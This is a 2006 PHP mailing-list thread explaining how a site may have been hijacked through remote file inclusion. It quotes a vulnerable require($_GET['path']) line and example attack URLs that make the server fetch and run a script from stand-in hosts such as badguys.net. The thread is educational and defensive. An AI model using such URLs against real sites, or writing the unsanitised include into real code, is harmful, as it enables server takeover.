Re: Fwd: [PHP] Highjack?
At 11:02 PM + 11/14/06, Tom Chubb wrote: Posts like this are what makes this list so great! It's better to read this here than experience it first hand! Thanks Tedd, for highlighting the problem. Tom Tom: You're welcome, but I never have a problem showing my ignorance. -- that just comes natural. The real thanks should go to the people who provide the answers. Thanks peoples. :-) tedd -- --- http://sperling.com http://ancientstones.com http://earthstones.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: Fwd: [PHP] Highjack?
Posts like this are what makes this list so great! It's better to read this here than experience it first hand! Thanks Tedd, for highlighting the problem. Tom On 14/11/06, tedd <[EMAIL PROTECTED]> wrote: At 9:13 PM + 11/14/06, Stut wrote: >Ok, so badscript.php is a bad name for this script. Let's say >show.php is a script you've written. You were tired, the kids were >running around you screaming and shouting, and you wrote something >like the following without really thinking about it... > > require($_GET['path'].'commonfuncs.inc.php'); > // Do other stuff here, using functions in commonfuncs.inc.php >?> > >The *bad guy* can now hit the URL... > >http://yoursite.com/show.php?path=http://badguys.net/injectionscript.txt?ignored= > >This causes show.php to include (i.e. execute!!) the remote file >injectionscript.txt from badguys.net at this URL... > >http://badguys.net/injectionscript.txt?ignored=commonfuncs.inc.php > >Since this gets executed on your server it can do anything one of >your scripts can do. The only symptom would be that show.php will >not work for that request. Do the bad guys care? Probably not, >because by the time it fails they've already replaced your index.php >and potentially installed a rootkit, backdoors and whatever else >(depending, of course, on how locked down the web server is and your >file permissions). > >Hope that makes sense now. > >-Stut -Stut: Yes, I believe that the "require($_GET[])" is one of the things Chris Shiflett talks about in his book. I should have guessed that was what everyone was talking about. But, considering that I never do that and my site was highjacked, I was thinking it must have been something different. It all makes sense now. Sorry for being so dense. Thanks everyone. tedd PS: My kids are too old to scream -- it's grand-kids now. -- --- http://sperling.com http://ancientstones.com http://earthstones.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: Fwd: [PHP] Highjack?
At 9:13 PM + 11/14/06, Stut wrote: Ok, so badscript.php is a bad name for this script. Let's say show.php is a script you've written. You were tired, the kids were running around you screaming and shouting, and you wrote something like the following without really thinking about it... The *bad guy* can now hit the URL... http://yoursite.com/show.php?path=http://badguys.net/injectionscript.txt?ignored= This causes show.php to include (i.e. execute!!) the remote file injectionscript.txt from badguys.net at this URL... http://badguys.net/injectionscript.txt?ignored=commonfuncs.inc.php Since this gets executed on your server it can do anything one of your scripts can do. The only symptom would be that show.php will not work for that request. Do the bad guys care? Probably not, because by the time it fails they've already replaced your index.php and potentially installed a rootkit, backdoors and whatever else (depending, of course, on how locked down the web server is and your file permissions). Hope that makes sense now. -Stut -Stut: Yes, I believe that the "require($_GET[])" is one of the things Chris Shiflett talks about in his book. I should have guessed that was what everyone was talking about. But, considering that I never do that and my site was highjacked, I was thinking it must have been something different. It all makes sense now. Sorry for being so dense. Thanks everyone. tedd PS: My kids are too old to scream -- it's grand-kids now. -- --- http://sperling.com http://ancientstones.com http://earthstones.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: Fwd: [PHP] Highjack?
tedd wrote: Ohhh, so "badscript.php doesn't have to exist and the badscript.txt is imported via the url, the script is built using only the badscript.txt, and then executed "as-is" -- clever. Off to try that... :-) ... Nope, that didn't work -- I still don't get it. I realize that one can grab stuff from another server, but I still don't see how one can do this. Ok, so badscript.php is a bad name for this script. Let's say show.php is a script you've written. You were tired, the kids were running around you screaming and shouting, and you wrote something like the following without really thinking about it... The *bad guy* can now hit the URL... http://yoursite.com/show.php?path=http://badguys.net/injectionscript.txt?ignored= This causes show.php to include (i.e. execute!!) the remote file injectionscript.txt from badguys.net at this URL... http://badguys.net/injectionscript.txt?ignored=commonfuncs.inc.php Since this gets executed on your server it can do anything one of your scripts can do. The only symptom would be that show.php will not work for that request. Do the bad guys care? Probably not, because by the time it fails they've already replaced your index.php and potentially installed a rootkit, backdoors and whatever else (depending, of course, on how locked down the web server is and your file permissions). Hope that makes sense now. -Stut -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: Fwd: [PHP] Highjack?
At 11:57 AM -0800 11/14/06, bruce wrote: hi tedd... for the following url, http://www.example.com/test.php?path=abc?dummy=123 if the register_globals is on, a malicious user could potentially invoke, http://www.example.com/badscript.php?path=http://www.badserver.com/badscript .txt?dummy=123, which would cause the 'badscript.txt' to be used in the original script. now, this in and of itself wouldn't cause a file on the http server to be changed. however, if the webapp somehow caused the $path var to be invoked or to be used in an exec() function, then whatever is in the 'badscript.txt' file will be run as if the file is on the local system. at this point, you're pretty much at whim of the malicious user. now, the chance of this happening is pretty slim, unless you're using some open source app that's unsecure, and that a user can reasonably easy find. which is what has happened to some apps in the past. a more potential reason for the index.php files to be changed, is that there was some security hole, either via apache, and/or the OS for the server. hope this helps a little bit more... Ohhh, so "badscript.php doesn't have to exist and the badscript.txt is imported via the url, the script is built using only the badscript.txt, and then executed "as-is" -- clever. Off to try that... :-) ... Nope, that didn't work -- I still don't get it. I realize that one can grab stuff from another server, but I still don't see how one can do this. Sorry, for being so dense. tedd -- --- http://sperling.com http://ancientstones.com http://earthstones.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: Fwd: [PHP] Highjack?
hi tedd... for the following url, http://www.example.com/test.php?path=abc?dummy=123 if the register_globals is on, a malicious user could potentially invoke, http://www.example.com/badscript.php?path=http://www.badserver.com/badscript .txt?dummy=123, which would cause the 'badscript.txt' to be used in the original script. now, this in and of itself wouldn't cause a file on the http server to be changed. however, if the webapp somehow caused the $path var to be invoked or to be used in an exec() function, then whatever is in the 'badscript.txt' file will be run as if the file is on the local system. at this point, you're pretty much at whim of the malicious user. now, the chance of this happening is pretty slim, unless you're using some open source app that's unsecure, and that a user can reasonably easy find. which is what has happened to some apps in the past. a more potential reason for the index.php files to be changed, is that there was some security hole, either via apache, and/or the OS for the server. hope this helps a little bit more... the http://www.example.com/badscript.php?could -Original Message- From: tedd [mailto:[EMAIL PROTECTED] Sent: Tuesday, November 14, 2006 11:46 AM To: Chris Shiflett Cc: PHP Subject: Re: Fwd: [PHP] Highjack? At 1:39 PM -0500 11/14/06, Chris Shiflett wrote: >tedd wrote: >> > The script will then include >> > http://www.badserver.com/badscript.txt?dummy=script.php >> >> I still don't see how "badscript.php" can be uploaded into >> example.com's site in the first place > >PHP sends a request to badserver.com for badscript.txt, and the content >of the response is included just as if it were the content of a local file. > >Hope that helps. > >Chris Chris; I'm still confused. >At 7:12 PM +0100 11/13/06, Rory Browne wrote: > >If register_globals is enabled, someone could >http://www.example.com/badscript.php?path=http://www.badserver.com/badscrip t.txt?dummy= If example.com is my domain, then how could evil-doer get access to my site to place "badscript.php" there? tedd -- --- http://sperling.com http://ancientstones.com http://earthstones.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: Fwd: [PHP] Highjack?
tedd wrote: > At 1:39 PM -0500 11/14/06, Chris Shiflett wrote: >> tedd wrote: >>> > The script will then include >>> > http://www.badserver.com/badscript.txt?dummy=script.php >>> >>> I still don't see how "badscript.php" can be uploaded into >>> example.com's site in the first place >> >> PHP sends a request to badserver.com for badscript.txt, and the content >> of the response is included just as if it were the content of a local >> file. >> >> Hope that helps. >> >> Chris > > Chris; > > I'm still confused. > >> At 7:12 PM +0100 11/13/06, Rory Browne wrote: >> >> If register_globals is enabled, someone could >> http://www.example.com/badscript.php?path=http://www.badserver.com/badscript.txt?dummy= >> > > If example.com is my domain, then how could evil-doer get access to my > site to place "badscript.php" there? in this hypothetical situation your a complete moron and you wrote this script: http://www.badserver.com/badscript.txt?dummy='; include $path; ?> and bad script contains: of course, in real life your not that stupid at all - but subtler versions of such vulns occur all of the place :-/ anyway Chris site(s) have lots of info on this subject - I recommend reading till something sticks (at least that my tactic :-) > > tedd > -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: Fwd: [PHP] Highjack?
(Top posting, as seems to be the trend in this thread) Tedd, It might be that you are hosting on a shared host, and that the attacker compromised another site on that host giving him access to your (and everyone else's) web root. If that is the case, your hosting provider needs to look into their file system security policies, and you need to re-evaluate your choice of providers. JM > > hi tedd... > > for the following url, > http://www.example.com/test.php?path=abc?dummy=123 > > if the register_globals is on, a malicious user could > potentially invoke, > http://www.example.com/badscript.php?path=http://www.badserver > .com/badscript > .txt?dummy=123, which would cause the 'badscript.txt' to be > used in the > original script. now, this in and of itself wouldn't cause a > file on the > http server to be changed. however, if the webapp somehow > caused the $path > var to be invoked or to be used in an exec() function, then > whatever is in > the 'badscript.txt' file will be run as if the file is on the > local system. > > at this point, you're pretty much at whim of the malicious > user. now, the > chance of this happening is pretty slim, unless you're using some open > source app that's unsecure, and that a user can reasonably > easy find. which > is what has happened to some apps in the past. > > a more potential reason for the index.php files to be > changed, is that there > was some security hole, either via apache, and/or the OS for > the server. > > hope this helps a little bit more... > > > > the http://www.example.com/badscript.php?could > > -----Original Message- > From: tedd [mailto:[EMAIL PROTECTED] > Sent: Tuesday, November 14, 2006 11:46 AM > To: Chris Shiflett > Cc: PHP > Subject: Re: Fwd: [PHP] Highjack? > > > At 1:39 PM -0500 11/14/06, Chris Shiflett wrote: > >tedd wrote: > >> > The script will then include > >> > http://www.badserver.com/badscript.txt?dummy=script.php > >> > >> I still don't see how "badscript.php" can be uploaded into > >> example.com's site in the first place > > > >PHP sends a request to badserver.com for badscript.txt, and > the content > >of the response is included just as if it were the content > of a local file. > > > >Hope that helps. > > > >Chris > > Chris; > > I'm still confused. > > >At 7:12 PM +0100 11/13/06, Rory Browne wrote: > > > >If register_globals is enabled, someone could > >http://www.example.com/badscript.php?path=http://www.badserve r.com/badscrip t.txt?dummy= If example.com is my domain, then how could evil-doer get access to my site to place "badscript.php" there? tedd -- --- http://sperling.com http://ancientstones.com http://earthstones.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: Fwd: [PHP] Highjack?
At 11:57 AM -0800 11/14/06, bruce wrote: hi tedd... for the following url, http://www.example.com/test.php?path=abc?dummy=123 if the register_globals is on, a malicious user could potentially invoke, http://www.example.com/badscript.php?path=http://www.badserver.com/badscript .txt?dummy=123, which would cause the 'badscript.txt' to be used in the original script. now, this in and of itself wouldn't cause a file on the http server to be changed. however, if the webapp somehow caused the $path var to be invoked or to be used in an exec() function, then whatever is in the 'badscript.txt' file will be run as if the file is on the local system. at this point, you're pretty much at whim of the malicious user. now, the chance of this happening is pretty slim, unless you're using some open source app that's unsecure, and that a user can reasonably easy find. which is what has happened to some apps in the past. a more potential reason for the index.php files to be changed, is that there was some security hole, either via apache, and/or the OS for the server. hope this helps a little bit more... Ohhh, so "badscript.php doesn't have to exist and the badscript.txt is imported via the url, the script is built using only the badscript.txt, and then executed "as-is" -- clever. Off to try that... :-) Thanks. tedd -- --- http://sperling.com http://ancientstones.com http://earthstones.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: Fwd: [PHP] Highjack?
At 1:39 PM -0500 11/14/06, Chris Shiflett wrote: tedd wrote: > The script will then include > http://www.badserver.com/badscript.txt?dummy=script.php I still don't see how "badscript.php" can be uploaded into example.com's site in the first place PHP sends a request to badserver.com for badscript.txt, and the content of the response is included just as if it were the content of a local file. Hope that helps. Chris Chris; I'm still confused. At 7:12 PM +0100 11/13/06, Rory Browne wrote: If register_globals is enabled, someone could http://www.example.com/badscript.php?path=http://www.badserver.com/badscript.txt?dummy= If example.com is my domain, then how could evil-doer get access to my site to place "badscript.php" there? tedd -- --- http://sperling.com http://ancientstones.com http://earthstones.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: Fwd: [PHP] Highjack?
tedd wrote: > > The script will then include > > http://www.badserver.com/badscript.txt?dummy=script.php > > I still don't see how "badscript.php" can be uploaded into > example.com's site in the first place PHP sends a request to badserver.com for badscript.txt, and the content of the response is included just as if it were the content of a local file. Hope that helps. Chris -- Chris Shiflett http://shiflett.org/ -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: Fwd: [PHP] Highjack?
At 7:12 PM +0100 11/13/06, Rory Browne wrote: If register_globals is enabled, someone could http://www.example.com/badscript.php?path=http://www.badserver.com/badscript.txt?dummy= The script will then include http://www.badserver.com/badscript.txt?dummy=script.php I still don't see how "badscript.php" can be uploaded into example.com's site in the first place -- unless "badscript.php" is not part of the evil-doers code but rather just a poor script. I have noticed that the host has disabled "shell_exec()" since the attack -- so, I wonder if this was the cause or just a shotgun approach to server protection. However, he still has register_globals ON and safe_mode OFF. tedd -- --- http://sperling.com http://ancientstones.com http://earthstones.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
